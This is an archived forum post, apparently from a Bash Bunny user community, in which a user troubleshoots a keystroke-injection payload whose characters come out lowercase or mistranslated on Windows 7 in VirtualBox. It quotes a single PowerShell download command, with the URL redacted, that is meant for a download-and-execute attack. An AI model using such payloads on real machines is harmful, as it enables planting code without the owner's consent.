Jump to content

Bash Bunny: Windows 7 output is all lowercase!


Zchap

Recommended Posts

So I have been experimenting with my bash bunny and preparing it for a windows 7 powershell download file and execute. I am in a virtualbox so that may be the problem! So inside the powershell command I use () and : windows 7 cmd translates "(" to 9 and ")" to 0 and ":" to ;  and all uppercase things are typed as lowercase. the command:

Q STRING "powershell(new-object net.webclient).DownloadFile('xxx','xxx'); "

Some more issues is that the URL am downloading has Uppercase characters which are not bring typed into the cmd.

Thanks in advance and HACK THE PLANET ~~0x5a

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...